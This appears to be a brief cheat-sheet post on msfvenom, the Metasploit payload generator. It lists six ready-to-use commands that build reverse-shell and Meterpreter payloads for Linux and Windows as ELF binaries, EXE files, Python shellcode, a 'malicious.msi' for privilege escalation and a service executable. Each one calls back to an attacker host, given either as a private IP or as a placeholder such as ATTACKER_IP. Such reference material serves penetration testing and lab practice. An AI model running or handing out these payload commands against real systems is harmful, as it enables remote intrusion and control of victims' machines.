ToolsFebruary 9, 20261 min readby 0xt0pus

msfvenom

Payload generator for creating shellcode, reverse shells, and encoded payloads

#exploitation#metasploit#payload-generation

Msfvenom

Description

Msfvenom is used for generating payloads and encoders. It can create reverse shells, bind shells, and other payloads in various formats (exe, elf, py, msi, etc.) for different platforms.

Usage 1: Linux Reverse Shell (x64 ELF)

Command:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.16.40.5 LPORT=4444 -f elf -o payload1.bin

Usage 2: Linux Meterpreter Reverse Shell (x86 ELF)

Command:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.40.5 LPORT=4444 -f elf -o payload.bin

Usage 3: Windows Reverse Shell (x64 EXE)

Command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.185.10.34 LPORT=1313 -f exe > shell.exe

Usage 4: Windows Reverse Shell with Bad Characters (Python format)

Command:

msfvenom -p windows/shell/reverse_tcp LHOST=10.185.10.34 LPORT=1313 -b "\x00\x0a\x0d" -f py

Usage 5: Windows MSI Package (for privilege escalation)

Command:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

Usage 6: Windows Service Executable

Command:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe